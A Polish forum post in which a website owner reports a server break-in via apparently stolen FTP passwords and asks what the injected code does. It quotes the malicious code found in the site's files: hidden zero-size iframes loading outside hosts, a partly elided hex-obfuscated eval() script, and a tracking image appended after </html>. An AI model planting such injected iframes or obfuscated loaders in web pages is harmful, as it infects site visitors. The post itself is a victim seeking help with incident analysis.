Nie bardzo wiem gdzie ten temat wcisnąć, w razie czego proszę o przeniesienie.
Parę dni temu ktoś wbił się nam na serwer. Wg administratorów serwera, zostały wykradzione hasła ftp...
W 2 plikach pojawił się kod:
<iframe border="0" frameborder="no" src="http://nudeteens.in/3/index.php" width="0" height="0"> <!-- [ c2d6386914320468a51227393bb2d185 ] -->
<script>eval('\x66\x75\x6e\x63\x74\x69\x6f
x30\x32\x25\x30\x32\x25\x31\x39\x25\x37\x66\x25\x33\x39\x25\x32\x33\x25\x37\x37\
x25\x33\x32\x25\x36\x30\x25\x32\x61\x25\x36\x66\x25\x36\x34\x25\x36\x39
\x25\x33\x33\x25\x36\x30\x25\x31\x61\x25\x36\x65\x25\x31\x30\x25\x33\x33\x25\x30
\x37\x25\x34\x63\x25\x30\x39\x25\x33\x65\x25\x36\x32\x25\x33\x38\x25\x33
[... tu cała masa linii tego typu ...]
\x32\x25\x33\x38\x25\x31\x65\x25\x36\x66\x25\x35\x32\x25\x31\x39\x25\x31\x37\x25
\x31\x31\x25\x33\x66\x25\x33\x31\x25\x33\x31\x25\x34\x65\x25\x35\x65\x25
\x37\x38\x25\x36\x35\x25\x31\x61\x25\x33\x63\x25\x37\x31\x25\x36\x65\x25\x33\x62
\x25\x32\x66\x25\x32\x32\x25\x33\x64\x25\x31\x62\x25\x31\x30\x25\x33\x61
\x25\x37\x34\x25\x37\x61\x25\x37\x66\x27\x29\x3b');
<iframe src='http://fleyk.biz/ce/index.php ' width='0' height='0' border='0'></iframe> <img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
Ponadto do praktycznie wszystkich indexów została doklejona ostatnia linijka powyższego kodu, tuż za </html> pojawiło się
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
A więc pakowało jakiś wredny skrypt na stronę.
Miał może ktoś coś podobnego i wie co taki wirus robi?
I czy poza zawirusowanym kompem kogoś kto loguje się na ftp, są jakieś inne metody wykradania haseł?